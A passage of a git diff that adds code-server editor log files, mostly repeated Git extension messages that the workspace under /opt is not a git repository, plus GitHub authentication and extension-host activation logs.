(GIT_DISCOVERY_ACROSS_FILESYSTEM not set). +2026-01-27 19:27:28.727 [info] > git rev-parse --show-toplevel [2ms] +2026-01-27 19:27:28.727 [info] fatal: not a git repository (or any parent up to mount point /opt) +Stopping at filesystem boundary (GIT_DISCOVERY_ACROSS_FILESYSTEM not set). +2026-01-27 19:30:07.767 [info] > git rev-parse --show-toplevel [1ms] +2026-01-27 19:30:07.767 [info] fatal: not a git repository (or any parent up to mount point /opt) +Stopping at filesystem boundary (GIT_DISCOVERY_ACROSS_FILESYSTEM not set). +2026-01-27 19:30:20.333 [info] > git rev-parse --show-toplevel [1ms] +2026-01-27 19:30:20.333 [info] fatal: not a git repository (or any parent up to mount point /opt) +Stopping at filesystem boundary (GIT_DISCOVERY_ACROSS_FILESYSTEM not set). +2026-01-27 19:30:33.804 [info] > git rev-parse --show-toplevel [1ms] +2026-01-27 19:30:33.804 [info] fatal: not a git repository (or any parent up to mount point /opt) +Stopping at filesystem boundary (GIT_DISCOVERY_ACROSS_FILESYSTEM not set). +2026-01-27 19:30:44.827 [info] > git rev-parse --show-toplevel [1ms] +2026-01-27 19:30:44.827 [info] fatal: not a git repository (or any parent up to mount point /opt) +Stopping at filesystem boundary (GIT_DISCOVERY_ACROSS_FILESYSTEM not set). +2026-01-27 19:33:02.189 [info] > git rev-parse --show-toplevel [1ms] +2026-01-27 19:33:02.189 [info] fatal: not a git repository (or any parent up to mount point /opt) +Stopping at filesystem boundary (GIT_DISCOVERY_ACROSS_FILESYSTEM not set). +2026-01-27 19:33:15.861 [info] > git rev-parse --show-toplevel [1ms] +2026-01-27 19:33:15.861 [info] fatal: not a git repository (or any parent up to mount point /opt) +Stopping at filesystem boundary (GIT_DISCOVERY_ACROSS_FILESYSTEM not set). +2026-01-27 19:33:28.344 [info] > git rev-parse --show-toplevel [2ms] +2026-01-27 19:33:28.344 [info] fatal: not a git repository (or any parent up to mount point /opt) +Stopping at filesystem boundary (GIT_DISCOVERY_ACROSS_FILESYSTEM not set). +2026-01-27 19:33:38.537 [info] > git rev-parse --show-toplevel [1ms] +2026-01-27 19:33:38.537 [info] fatal: not a git repository (or any parent up to mount point /opt) +Stopping at filesystem boundary (GIT_DISCOVERY_ACROSS_FILESYSTEM not set). +2026-01-27 19:35:51.716 [info] > git rev-parse --show-toplevel [11ms] +2026-01-27 19:35:51.716 [info] fatal: not a git repository (or any parent up to mount point /opt) +Stopping at filesystem boundary (GIT_DISCOVERY_ACROSS_FILESYSTEM not set). +2026-01-27 19:36:05.457 [info] > git rev-parse --show-toplevel [2ms] +2026-01-27 19:36:05.457 [info] fatal: not a git repository (or any parent up to mount point /opt) +Stopping at filesystem boundary (GIT_DISCOVERY_ACROSS_FILESYSTEM not set). +2026-01-27 19:36:16.932 [info] > git rev-parse --show-toplevel [1ms] +2026-01-27 19:36:16.932 [info] fatal: not a git repository (or any parent up to mount point /opt) +Stopping at filesystem boundary (GIT_DISCOVERY_ACROSS_FILESYSTEM not set). +2026-01-27 19:36:27.092 [info] > git rev-parse --show-toplevel [2ms] +2026-01-27 19:36:27.092 [info] fatal: not a git repository (or any parent up to mount point /opt) +Stopping at filesystem boundary (GIT_DISCOVERY_ACROSS_FILESYSTEM not set). +2026-01-27 19:37:16.063 [info] > git rev-parse --show-toplevel [1ms] +2026-01-27 19:37:16.063 [info] fatal: not a git repository (or any parent up to mount point /opt) +Stopping at filesystem boundary (GIT_DISCOVERY_ACROSS_FILESYSTEM not set). +2026-01-27 19:38:04.644 [info] > git rev-parse --show-toplevel [3ms] +2026-01-27 19:38:04.644 [info] fatal: not a git repository (or any parent up to mount point /opt) +Stopping at filesystem boundary (GIT_DISCOVERY_ACROSS_FILESYSTEM not set). +2026-01-27 19:38:14.991 [info] > git rev-parse --show-toplevel [3ms] +2026-01-27 19:38:14.991 [info] fatal: not a git repository (or any parent up to mount point /opt) +Stopping at filesystem boundary (GIT_DISCOVERY_ACROSS_FILESYSTEM not set). +2026-01-27 19:38:26.561 [info] > git rev-parse --show-toplevel [1ms] +2026-01-27 19:38:26.561 [info] fatal: not a git repository (or any parent up to mount point /opt) +Stopping at filesystem boundary (GIT_DISCOVERY_ACROSS_FILESYSTEM not set). +2026-01-27 19:38:36.278 [info] > git rev-parse --show-toplevel [1ms] +2026-01-27 19:38:36.278 [info] fatal: not a git repository (or any parent up to mount point /opt) +Stopping at filesystem boundary (GIT_DISCOVERY_ACROSS_FILESYSTEM not set). +2026-01-27 19:40:08.055 [info] > git rev-parse --show-toplevel [1ms] +2026-01-27 19:40:08.055 [info] fatal: not a git repository (or any parent up to mount point /opt) +Stopping at filesystem boundary (GIT_DISCOVERY_ACROSS_FILESYSTEM not set). +2026-01-27 19:40:18.633 [info] > git rev-parse --show-toplevel [1ms] +2026-01-27 19:40:18.633 [info] fatal: not a git repository (or any parent up to mount point /opt) +Stopping at filesystem boundary (GIT_DISCOVERY_ACROSS_FILESYSTEM not set). +2026-01-27 19:40:27.733 [info] > git rev-parse --show-toplevel [2ms] +2026-01-27 19:40:27.733 [info] fatal: not a git repository (or any parent up to mount point /opt) +Stopping at filesystem boundary (GIT_DISCOVERY_ACROSS_FILESYSTEM not set). +2026-01-27 19:40:38.033 [info] > git rev-parse --show-toplevel [2ms] +2026-01-27 19:40:38.033 [info] fatal: not a git repository (or any parent up to mount point /opt) +Stopping at filesystem boundary (GIT_DISCOVERY_ACROSS_FILESYSTEM not set). +2026-01-27 19:43:03.513 [info] > git rev-parse --show-toplevel [1ms] +2026-01-27 19:43:03.513 [info] fatal: not a git repository (or any parent up to mount point /opt) +Stopping at filesystem boundary (GIT_DISCOVERY_ACROSS_FILESYSTEM not set). +2026-01-27 19:43:24.160 [info] > git rev-parse --show-toplevel [1ms] +2026-01-27 19:43:24.160 [info] fatal: not a git repository (or any parent up to mount point /opt) +Stopping at filesystem boundary (GIT_DISCOVERY_ACROSS_FILESYSTEM not set). +2026-01-27 19:43:36.929 [info] > git rev-parse --show-toplevel [2ms] +2026-01-27 19:43:36.929 [info] fatal: not a git repository (or any parent up to mount point /opt) +Stopping at filesystem boundary (GIT_DISCOVERY_ACROSS_FILESYSTEM not set). +2026-01-27 19:43:51.558 [info] > git rev-parse --show-toplevel [1ms] +2026-01-27 19:43:51.559 [info] fatal: not a git repository (or any parent up to mount point /opt) +Stopping at filesystem boundary (GIT_DISCOVERY_ACROSS_FILESYSTEM not set). +2026-01-27 19:55:48.411 [info] > git rev-parse --show-toplevel [1ms] +2026-01-27 19:55:48.411 [info] fatal: not a git repository (or any parent up to mount point /opt) +Stopping at filesystem boundary (GIT_DISCOVERY_ACROSS_FILESYSTEM not set). +2026-01-27 20:16:54.730 [info] > git rev-parse --show-toplevel [2ms] +2026-01-27 20:16:54.730 [info] fatal: not a git repository (or any parent up to mount point /opt) +Stopping at filesystem boundary (GIT_DISCOVERY_ACROSS_FILESYSTEM not set). +2026-01-27 20:19:52.541 [info] > git rev-parse --show-toplevel [1ms] +2026-01-27 20:19:52.541 [info] fatal: not a git repository (or any parent up to mount point /opt) +Stopping at filesystem boundary (GIT_DISCOVERY_ACROSS_FILESYSTEM not set). +2026-01-27 20:20:08.200 [info] > git rev-parse --show-toplevel [1ms] +2026-01-27 20:20:08.200 [info] fatal: not a git repository (or any parent up to mount point /opt) +Stopping at filesystem boundary (GIT_DISCOVERY_ACROSS_FILESYSTEM not set). +2026-01-27 20:20:23.379 [info] > git rev-parse --show-toplevel [1ms] +2026-01-27 20:20:23.379 [info] fatal: not a git repository (or any parent up to mount point /opt) +Stopping at filesystem boundary (GIT_DISCOVERY_ACROSS_FILESYSTEM not set). +2026-01-27 20:25:30.143 [info] > git rev-parse --show-toplevel [3ms] +2026-01-27 20:25:30.143 [info] fatal: not a git repository (or any parent up to mount point /opt) +Stopping at filesystem boundary (GIT_DISCOVERY_ACROSS_FILESYSTEM not set). +2026-01-27 20:25:39.874 [info] > git rev-parse --show-toplevel [1ms] +2026-01-27 20:25:39.874 [info] fatal: not a git repository (or any parent up to mount point /opt) +Stopping at filesystem boundary (GIT_DISCOVERY_ACROSS_FILESYSTEM not set). +2026-01-27 20:25:48.780 [info] > git rev-parse --show-toplevel [2ms] +2026-01-27 20:25:48.780 [info] fatal: not a git repository (or any parent up to mount point /opt) +Stopping at filesystem boundary (GIT_DISCOVERY_ACROSS_FILESYSTEM not set). +2026-01-27 20:28:53.940 [info] > git rev-parse --show-toplevel [4ms] +2026-01-27 20:28:53.940 [info] fatal: not a git repository (or any parent up to mount point /opt) +Stopping at filesystem boundary (GIT_DISCOVERY_ACROSS_FILESYSTEM not set). +2026-01-27 20:39:24.633 [info] > git rev-parse --show-toplevel [3ms] +2026-01-27 20:39:24.633 [info] fatal: not a git repository (or any parent up to mount point /opt) +Stopping at filesystem boundary (GIT_DISCOVERY_ACROSS_FILESYSTEM not set). +2026-01-27 20:39:34.838 [info] > git rev-parse --show-toplevel [1ms] +2026-01-27 20:39:34.838 [info] fatal: not a git repository (or any parent up to mount point /opt) +Stopping at filesystem boundary (GIT_DISCOVERY_ACROSS_FILESYSTEM not set). +2026-01-27 20:39:43.894 [info] > git rev-parse --show-toplevel [1ms] +2026-01-27 20:39:43.894 [info] fatal: not a git repository (or any parent up to mount point /opt) +Stopping at filesystem boundary (GIT_DISCOVERY_ACROSS_FILESYSTEM not set). +2026-01-27 20:49:35.412 [info] > git rev-parse --show-toplevel [1ms] +2026-01-27 20:49:35.412 [info] fatal: not a git repository (or any parent up to mount point /opt) +Stopping at filesystem boundary (GIT_DISCOVERY_ACROSS_FILESYSTEM not set). +2026-01-27 20:49:49.159 [info] > git rev-parse --show-toplevel [1ms] +2026-01-27 20:49:49.159 [info] fatal: not a git repository (or any parent up to mount point /opt) +Stopping at filesystem boundary (GIT_DISCOVERY_ACROSS_FILESYSTEM not set). +2026-01-27 20:50:03.705 [info] > git rev-parse --show-toplevel [2ms] +2026-01-27 20:50:03.705 [info] fatal: not a git repository (or any parent up to mount point /opt) +Stopping at filesystem boundary (GIT_DISCOVERY_ACROSS_FILESYSTEM not set). +2026-01-27 20:59:03.535 [info] > git rev-parse --show-toplevel [2ms] +2026-01-27 20:59:03.535 [info] fatal: not a git repository (or any parent up to mount point /opt) +Stopping at filesystem boundary (GIT_DISCOVERY_ACROSS_FILESYSTEM not set). +2026-01-27 20:59:15.395 [info] > git rev-parse --show-toplevel [4ms] +2026-01-27 20:59:15.395 [info] fatal: not a git repository (or any parent up to mount point /opt) +Stopping at filesystem boundary (GIT_DISCOVERY_ACROSS_FILESYSTEM not set). +2026-01-27 20:59:24.585 [info] > git rev-parse --show-toplevel [1ms] +2026-01-27 20:59:24.585 [info] fatal: not a git repository (or any parent up to mount point /opt) +Stopping at filesystem boundary (GIT_DISCOVERY_ACROSS_FILESYSTEM not set). +2026-01-27 20:59:33.564 [info] > git rev-parse --show-toplevel [1ms] +2026-01-27 20:59:33.564 [info] fatal: not a git repository (or any parent up to mount point /opt) +Stopping at filesystem boundary (GIT_DISCOVERY_ACROSS_FILESYSTEM not set). +2026-01-27 21:03:44.490 [info] > git rev-parse --show-toplevel [3ms] +2026-01-27 21:03:44.490 [info] fatal: not a git repository (or any parent up to mount point /opt) +Stopping at filesystem boundary (GIT_DISCOVERY_ACROSS_FILESYSTEM not set). +2026-01-27 21:04:08.042 [info] > git rev-parse --show-toplevel [1ms] +2026-01-27 21:04:08.042 [info] fatal: not a git repository (or any parent up to mount point /opt) +Stopping at filesystem boundary (GIT_DISCOVERY_ACROSS_FILESYSTEM not set). +2026-01-27 21:04:17.467 [info] > git rev-parse --show-toplevel [1ms] +2026-01-27 21:04:17.467 [info] fatal: not a git repository (or any parent up to mount point /opt) +Stopping at filesystem boundary (GIT_DISCOVERY_ACROSS_FILESYSTEM not set). +2026-01-27 21:29:17.528 [info] > git rev-parse --show-toplevel [1ms] +2026-01-27 21:29:17.528 [info] fatal: not a git repository (or any parent up to mount point /opt) +Stopping at filesystem boundary (GIT_DISCOVERY_ACROSS_FILESYSTEM not set). +2026-01-27 21:29:29.489 [info] > git rev-parse --show-toplevel [2ms] +2026-01-27 21:29:29.489 [info] fatal: not a git repository (or any parent up to mount point /opt) +Stopping at filesystem boundary (GIT_DISCOVERY_ACROSS_FILESYSTEM not set). +2026-01-27 21:29:40.811 [info] > git rev-parse --show-toplevel [1ms] +2026-01-27 21:29:40.811 [info] fatal: not a git repository (or any parent up to mount point /opt) +Stopping at filesystem boundary (GIT_DISCOVERY_ACROSS_FILESYSTEM not set). +2026-01-27 21:34:11.150 [info] > git rev-parse --show-toplevel [1ms] +2026-01-27 21:34:11.150 [info] fatal: not a git repository (or any parent up to mount point /opt) +Stopping at filesystem boundary (GIT_DISCOVERY_ACROSS_FILESYSTEM not set). +2026-01-27 21:34:20.950 [info] > git rev-parse --show-toplevel [2ms] +2026-01-27 21:34:20.950 [info] fatal: not a git repository (or any parent up to mount point /opt) +Stopping at filesystem boundary (GIT_DISCOVERY_ACROSS_FILESYSTEM not set). +2026-01-27 21:34:32.847 [info] > git rev-parse --show-toplevel [1ms] +2026-01-27 21:34:32.847 [info] fatal: not a git repository (or any parent up to mount point /opt) +Stopping at filesystem boundary (GIT_DISCOVERY_ACROSS_FILESYSTEM not set). +2026-01-27 21:36:37.145 [info] > git rev-parse --show-toplevel [1ms] +2026-01-27 21:36:37.145 [info] fatal: not a git repository (or any parent up to mount point /opt) +Stopping at filesystem boundary (GIT_DISCOVERY_ACROSS_FILESYSTEM not set). +2026-01-27 21:36:47.270 [info] > git rev-parse --show-toplevel [1ms] +2026-01-27 21:36:47.270 [info] fatal: not a git repository (or any parent up to mount point /opt) +Stopping at filesystem boundary (GIT_DISCOVERY_ACROSS_FILESYSTEM not set). +2026-01-27 21:36:56.335 [info] > git rev-parse --show-toplevel [1ms] +2026-01-27 21:36:56.335 [info] fatal: not a git repository (or any parent up to mount point /opt) +Stopping at filesystem boundary (GIT_DISCOVERY_ACROSS_FILESYSTEM not set). +2026-01-27 21:37:32.577 [info] > git rev-parse --show-toplevel [4ms] +2026-01-27 21:37:32.577 [info] fatal: not a git repository (or any parent up to mount point /opt) +Stopping at filesystem boundary (GIT_DISCOVERY_ACROSS_FILESYSTEM not set). +2026-01-27 21:38:50.743 [info] > git rev-parse --show-toplevel [1ms] +2026-01-27 21:38:50.743 [info] fatal: not a git repository (or any parent up to mount point /opt) +Stopping at filesystem boundary (GIT_DISCOVERY_ACROSS_FILESYSTEM not set). +2026-01-27 21:39:02.184 [info] > git rev-parse --show-toplevel [1ms] +2026-01-27 21:39:02.184 [info] fatal: not a git repository (or any parent up to mount point /opt) +Stopping at filesystem boundary (GIT_DISCOVERY_ACROSS_FILESYSTEM not set). +2026-01-27 21:39:11.265 [info] > git rev-parse --show-toplevel [1ms] +2026-01-27 21:39:11.265 [info] fatal: not a git repository (or any parent up to mount point /opt) +Stopping at filesystem boundary (GIT_DISCOVERY_ACROSS_FILESYSTEM not set). +2026-01-27 21:41:44.854 [info] > git rev-parse --show-toplevel [2ms] +2026-01-27 21:41:44.854 [info] fatal: not a git repository (or any parent up to mount point /opt) +Stopping at filesystem boundary (GIT_DISCOVERY_ACROSS_FILESYSTEM not set). +2026-01-27 21:46:01.308 [info] > git rev-parse --show-toplevel [1ms] +2026-01-27 21:46:01.308 [info] fatal: not a git repository (or any parent up to mount point /opt) +Stopping at filesystem boundary (GIT_DISCOVERY_ACROSS_FILESYSTEM not set). +2026-01-27 21:46:03.897 [info] > git rev-parse --show-toplevel [2ms] +2026-01-27 21:46:03.897 [info] fatal: not a git repository (or any parent up to mount point /opt) +Stopping at filesystem boundary (GIT_DISCOVERY_ACROSS_FILESYSTEM not set). +2026-01-27 21:46:13.785 [info] > git rev-parse --show-toplevel [1ms] +2026-01-27 21:46:13.785 [info] fatal: not a git repository (or any parent up to mount point /opt) +Stopping at filesystem boundary (GIT_DISCOVERY_ACROSS_FILESYSTEM not set). +2026-01-27 21:46:23.695 [info] > git rev-parse --show-toplevel [1ms] +2026-01-27 21:46:23.695 [info] fatal: not a git repository (or any parent up to mount point /opt) +Stopping at filesystem boundary (GIT_DISCOVERY_ACROSS_FILESYSTEM not set). +2026-01-27 21:51:43.120 [info] > git rev-parse --show-toplevel [1ms] +2026-01-27 21:51:43.120 [info] fatal: not a git repository (or any parent up to mount point /opt) +Stopping at filesystem boundary (GIT_DISCOVERY_ACROSS_FILESYSTEM not set). +2026-01-27 21:51:54.733 [info] > git rev-parse --show-toplevel [2ms] +2026-01-27 21:51:54.733 [info] fatal: not a git repository (or any parent up to mount point /opt) +Stopping at filesystem boundary (GIT_DISCOVERY_ACROSS_FILESYSTEM not set). +2026-01-27 21:53:22.329 [info] > git rev-parse --show-toplevel [1ms] +2026-01-27 21:53:22.329 [info] fatal: not a git repository (or any parent up to mount point /opt) +Stopping at filesystem boundary (GIT_DISCOVERY_ACROSS_FILESYSTEM not set). +2026-01-27 21:54:31.654 [info] > git rev-parse --show-toplevel [1ms] +2026-01-27 21:54:31.654 [info] fatal: not a git repository (or any parent up to mount point /opt) +Stopping at filesystem boundary (GIT_DISCOVERY_ACROSS_FILESYSTEM not set). +2026-01-27 21:54:41.731 [info] > git rev-parse --show-toplevel [1ms] +2026-01-27 21:54:41.731 [info] fatal: not a git repository (or any parent up to mount point /opt) +Stopping at filesystem boundary (GIT_DISCOVERY_ACROSS_FILESYSTEM not set). +2026-01-27 21:54:51.063 [info] > git rev-parse --show-toplevel [3ms] +2026-01-27 21:54:51.063 [info] fatal: not a git repository (or any parent up to mount point /opt) +Stopping at filesystem boundary (GIT_DISCOVERY_ACROSS_FILESYSTEM not set). +2026-01-27 21:55:41.173 [info] > git rev-parse --show-toplevel [1ms] +2026-01-27 21:55:41.174 [info] fatal: not a git repository (or any parent up to mount point /opt) +Stopping at filesystem boundary (GIT_DISCOVERY_ACROSS_FILESYSTEM not set). +2026-01-27 21:57:10.311 [info] > git rev-parse --show-toplevel [1ms] +2026-01-27 21:57:10.311 [info] fatal: not a git repository (or any parent up to mount point /opt) +Stopping at filesystem boundary (GIT_DISCOVERY_ACROSS_FILESYSTEM not set). +2026-01-27 21:57:19.875 [info] > git rev-parse --show-toplevel [2ms] +2026-01-27 21:57:19.875 [info] fatal: not a git repository (or any parent up to mount point /opt) +Stopping at filesystem boundary (GIT_DISCOVERY_ACROSS_FILESYSTEM not set). +2026-01-27 22:04:02.788 [info] > git rev-parse --show-toplevel [1ms] +2026-01-27 22:04:02.788 [info] fatal: not a git repository (or any parent up to mount point /opt) +Stopping at filesystem boundary (GIT_DISCOVERY_ACROSS_FILESYSTEM not set). +2026-01-27 22:04:13.421 [info] > git rev-parse --show-toplevel [2ms] +2026-01-27 22:04:13.421 [info] fatal: not a git repository (or any parent up to mount point /opt) +Stopping at filesystem boundary (GIT_DISCOVERY_ACROSS_FILESYSTEM not set). +2026-01-27 22:07:40.283 [info] > git rev-parse --show-toplevel [1ms] +2026-01-27 22:07:40.283 [info] fatal: not a git repository (or any parent up to mount point /opt) +Stopping at filesystem boundary (GIT_DISCOVERY_ACROSS_FILESYSTEM not set). +2026-01-27 22:07:55.051 [info] > git rev-parse --show-toplevel [3ms] +2026-01-27 22:07:55.051 [info] fatal: not a git repository (or any parent up to mount point /opt) +Stopping at filesystem boundary (GIT_DISCOVERY_ACROSS_FILESYSTEM not set). diff --git a/.vscode_config/.local/share/code-server/logs/20260126T174543/exthost5/vscode.github-authentication/GitHub Authentication.log b/.vscode_config/.local/share/code-server/logs/20260126T174543/exthost5/vscode.github-authentication/GitHub Authentication.log new file mode 100755 index 0000000..5c35a89 --- /dev/null +++ b/.vscode_config/.local/share/code-server/logs/20260126T174543/exthost5/vscode.github-authentication/GitHub Authentication.log @@ -0,0 +1,33 @@ +2026-01-27 18:12:59.975 [info] Reading sessions from keychain... +2026-01-27 18:12:59.975 [info] Getting sessions for all scopes... +2026-01-27 18:12:59.975 [info] Got 0 sessions for ... +2026-01-27 18:12:59.975 [info] Getting sessions for all scopes... +2026-01-27 18:12:59.975 [info] Got 0 sessions for ... +2026-01-27 18:12:59.975 [info] Getting sessions for all scopes... +2026-01-27 18:12:59.975 [info] Got 0 sessions for ... +2026-01-27 18:12:59.975 [info] Getting sessions for all scopes... +2026-01-27 18:12:59.975 [info] Got 0 sessions for ... +2026-01-27 18:12:59.975 [info] Getting sessions for all scopes... +2026-01-27 18:12:59.975 [info] Got 0 sessions for ... +2026-01-27 18:12:59.975 [info] Getting sessions for all scopes... +2026-01-27 18:12:59.975 [info] Got 0 sessions for ... +2026-01-27 18:12:59.975 [info] Getting sessions for all scopes... +2026-01-27 18:12:59.975 [info] Got 0 sessions for ... +2026-01-27 18:12:59.975 [info] Getting sessions for all scopes... +2026-01-27 18:12:59.975 [info] Got 0 sessions for ... +2026-01-27 18:12:59.975 [info] Getting sessions for all scopes... +2026-01-27 18:12:59.975 [info] Got 0 sessions for ... +2026-01-27 18:13:00.092 [info] Getting sessions for all scopes... +2026-01-27 18:13:00.092 [info] Got 0 sessions for ... +2026-01-27 18:13:00.178 [info] Getting sessions for all scopes... +2026-01-27 18:13:00.178 [info] Got 0 sessions for ... +2026-01-27 18:13:00.179 [info] Getting sessions for all scopes... +2026-01-27 18:13:00.179 [info] Got 0 sessions for ... +2026-01-27 18:13:00.179 [info] Getting sessions for all scopes... +2026-01-27 18:13:00.179 [info] Got 0 sessions for ... +2026-01-27 18:13:00.179 [info] Getting sessions for all scopes... +2026-01-27 18:13:00.179 [info] Got 0 sessions for ... +2026-01-27 18:13:00.179 [info] Getting sessions for all scopes... +2026-01-27 18:13:00.179 [info] Got 0 sessions for ... +2026-01-27 18:13:01.705 [info] Getting sessions for all scopes... +2026-01-27 18:13:01.705 [info] Got 0 sessions for ... diff --git a/.vscode_config/.local/share/code-server/logs/20260126T174543/exthost5/vscode.github/GitHub.log b/.vscode_config/.local/share/code-server/logs/20260126T174543/exthost5/vscode.github/GitHub.log new file mode 100755 index 0000000..d8d38be --- /dev/null +++ b/.vscode_config/.local/share/code-server/logs/20260126T174543/exthost5/vscode.github/GitHub.log @@ -0,0 +1 @@ +2026-01-27 18:13:00.360 [info] Log level: Info diff --git a/.vscode_config/.local/share/code-server/logs/20260126T174543/exthost6/remoteExtHostTelemetry.log b/.vscode_config/.local/share/code-server/logs/20260126T174543/exthost6/remoteExtHostTelemetry.log new file mode 100755 index 0000000..e69de29 diff --git a/.vscode_config/.local/share/code-server/logs/20260126T174543/exthost6/remoteexthost.log b/.vscode_config/.local/share/code-server/logs/20260126T174543/exthost6/remoteexthost.log new file mode 100755 index 0000000..7e29462 --- /dev/null +++ b/.vscode_config/.local/share/code-server/logs/20260126T174543/exthost6/remoteexthost.log @@ -0,0 +1,15 @@ +2026-01-27 22:09:47.775 [info] Extension host with pid 126234 started +2026-01-27 22:09:47.784 [info] Lock '/root/.local/share/code-server/User/workspaceStorage/70d739db/vscode.lock': Lock acquired. +2026-01-27 22:09:47.895 [info] ExtensionService#_doActivateExtension vscode.github-authentication, startup: false, activationEvent: 'onAuthenticationRequest:github' +2026-01-27 22:09:47.896 [info] ExtensionService#_doActivateExtension vscode.emmet, startup: false, activationEvent: 'onLanguage' +2026-01-27 22:09:48.022 [info] ExtensionService#_doActivateExtension vscode.git-base, startup: true, activationEvent: '*', root cause: vscode.git +2026-01-27 22:09:48.054 [info] ExtensionService#_doActivateExtension vscode.git, startup: true, activationEvent: '*' +2026-01-27 22:09:48.055 [info] ExtensionService#_doActivateExtension vscode.github, startup: true, activationEvent: '*' +2026-01-27 22:09:48.273 [info] Eager extensions activated +2026-01-27 22:09:48.274 [info] ExtensionService#_doActivateExtension vscode.debug-auto-launch, startup: false, activationEvent: 'onStartupFinished' +2026-01-27 22:09:48.274 [info] ExtensionService#_doActivateExtension vscode.merge-conflict, startup: false, activationEvent: 'onStartupFinished' +2026-01-27 22:09:48.419 [info] ExtensionService#_doActivateExtension vscode.terminal-suggest, startup: false, activationEvent: 'onTerminalShellIntegration:*' +2026-01-27 22:31:33.672 [info] ExtensionService#_doActivateExtension vscode.npm, startup: false, activationEvent: 'onTerminalQuickFixRequest:ms-vscode.npm-command' +2026-01-28 00:37:30.906 [info] Extension host terminating: received terminate message from renderer +2026-01-28 00:37:30.907 [info] Lock '/root/.local/share/code-server/User/workspaceStorage/70d739db/vscode.lock': Marking the lockfile as scheduled to be released in 6000 ms. +2026-01-28 00:37:30.966 [info] Extension host with pid 126234 exiting with code 0 diff --git a/.vscode_config/.local/share/code-server/logs/20260126T174543/exthost6/vscode.git/Git.log b/.vscode_config/.local/share/code-server/logs/20260126T174543/exthost6/vscode.git/Git.log new file mode 100755 index 0000000..e03038c --- /dev/null +++ b/.vscode_config/.local/share/code-server/logs/20260126T174543/exthost6/vscode.git/Git.log @@ -0,0 +1,212 @@ +2026-01-27 22:09:48.319 [info] [main] Log level: Info +2026-01-27 22:09:48.319 [info] [main] Validating found git in: "git" +2026-01-27 22:09:48.319 [info] [main] Using git "2.39.5" from "git" +2026-01-27 22:09:48.319 [info] [Model][doInitialScan] Initial repository scan started +2026-01-27 22:09:48.319 [info] > git rev-parse --show-toplevel [2ms] +2026-01-27 22:09:48.319 [info] fatal: not a git repository (or any parent up to mount point /opt) +Stopping at filesystem boundary (GIT_DISCOVERY_ACROSS_FILESYSTEM not set). +2026-01-27 22:09:48.319 [info] > git rev-parse --show-toplevel [2ms] +2026-01-27 22:09:48.319 [info] fatal: not a git repository (or any parent up to mount point /opt) +Stopping at filesystem boundary (GIT_DISCOVERY_ACROSS_FILESYSTEM not set). +2026-01-27 22:09:48.319 [info] > git rev-parse --show-toplevel [1ms] +2026-01-27 22:09:48.319 [info] fatal: not a git repository (or any parent up to mount point /opt) +Stopping at filesystem boundary (GIT_DISCOVERY_ACROSS_FILESYSTEM not set). +2026-01-27 22:09:48.319 [info] > git rev-parse --show-toplevel [2ms] +2026-01-27 22:09:48.319 [info] fatal: not a git repository (or any parent up to mount point /opt) +Stopping at filesystem boundary (GIT_DISCOVERY_ACROSS_FILESYSTEM not set). +2026-01-27 22:09:48.323 [info] > git rev-parse --show-toplevel [1ms] +2026-01-27 22:09:48.323 [info] fatal: not a git repository (or any parent up to mount point /opt) +Stopping at filesystem boundary (GIT_DISCOVERY_ACROSS_FILESYSTEM not set). +2026-01-27 22:09:48.327 [info] > git rev-parse --show-toplevel [1ms] +2026-01-27 22:09:48.327 [info] fatal: not a git repository (or any parent up to mount point /opt) +Stopping at filesystem boundary (GIT_DISCOVERY_ACROSS_FILESYSTEM not set). +2026-01-27 22:09:48.331 [info] > git rev-parse --show-toplevel [2ms] +2026-01-27 22:09:48.331 [info] fatal: not a git repository (or any parent up to mount point /opt) +Stopping at filesystem boundary (GIT_DISCOVERY_ACROSS_FILESYSTEM not set). +2026-01-27 22:09:48.358 [info] > git rev-parse --show-toplevel [25ms] +2026-01-27 22:09:48.358 [info] fatal: not a git repository (or any parent up to mount point /opt) +Stopping at filesystem boundary (GIT_DISCOVERY_ACROSS_FILESYSTEM not set). +2026-01-27 22:09:48.368 [info] > git rev-parse --show-toplevel [7ms] +2026-01-27 22:09:48.368 [info] fatal: not a git repository (or any parent up to mount point /opt) +Stopping at filesystem boundary (GIT_DISCOVERY_ACROSS_FILESYSTEM not set). +2026-01-27 22:09:48.373 [info] > git rev-parse --show-toplevel [2ms] +2026-01-27 22:09:48.373 [info] fatal: not a git repository (or any parent up to mount point /opt) +Stopping at filesystem boundary (GIT_DISCOVERY_ACROSS_FILESYSTEM not set). +2026-01-27 22:09:48.377 [info] > git rev-parse --show-toplevel [1ms] +2026-01-27 22:09:48.377 [info] fatal: not a git repository (or any parent up to mount point /opt) +Stopping at filesystem boundary (GIT_DISCOVERY_ACROSS_FILESYSTEM not set). +2026-01-27 22:09:48.380 [info] > git rev-parse --show-toplevel [1ms] +2026-01-27 22:09:48.380 [info] fatal: not a git repository (or any parent up to mount point /opt) +Stopping at filesystem boundary (GIT_DISCOVERY_ACROSS_FILESYSTEM not set). +2026-01-27 22:09:48.384 [info] > git rev-parse --show-toplevel [1ms] +2026-01-27 22:09:48.384 [info] fatal: not a git repository (or any parent up to mount point /opt) +Stopping at filesystem boundary (GIT_DISCOVERY_ACROSS_FILESYSTEM not set). +2026-01-27 22:09:48.388 [info] > git rev-parse --show-toplevel [2ms] +2026-01-27 22:09:48.388 [info] fatal: not a git repository (or any parent up to mount point /opt) +Stopping at filesystem boundary (GIT_DISCOVERY_ACROSS_FILESYSTEM not set). +2026-01-27 22:09:48.392 [info] [Model][doInitialScan] Initial repository scan completed - repositories (0), closed repositories (0), parent repositories (0), unsafe repositories (0) +2026-01-27 22:09:48.530 [info] > git rev-parse --show-toplevel [1ms] +2026-01-27 22:09:48.530 [info] fatal: not a git repository (or any parent up to mount point /opt) +Stopping at filesystem boundary (GIT_DISCOVERY_ACROSS_FILESYSTEM not set). +2026-01-27 22:09:49.826 [info] > git rev-parse --show-toplevel [5ms] +2026-01-27 22:09:49.826 [info] fatal: not a git repository (or any parent up to mount point /opt) +Stopping at filesystem boundary (GIT_DISCOVERY_ACROSS_FILESYSTEM not set). +2026-01-27 22:12:54.277 [info] > git rev-parse --show-toplevel [1ms] +2026-01-27 22:12:54.277 [info] fatal: not a git repository (or any parent up to mount point /opt) +Stopping at filesystem boundary (GIT_DISCOVERY_ACROSS_FILESYSTEM not set). +2026-01-27 22:13:05.138 [info] > git rev-parse --show-toplevel [1ms] +2026-01-27 22:13:05.139 [info] fatal: not a git repository (or any parent up to mount point /opt) +Stopping at filesystem boundary (GIT_DISCOVERY_ACROSS_FILESYSTEM not set). +2026-01-27 22:13:06.004 [info] > git rev-parse --show-toplevel [5ms] +2026-01-27 22:13:06.005 [info] fatal: not a git repository (or any parent up to mount point 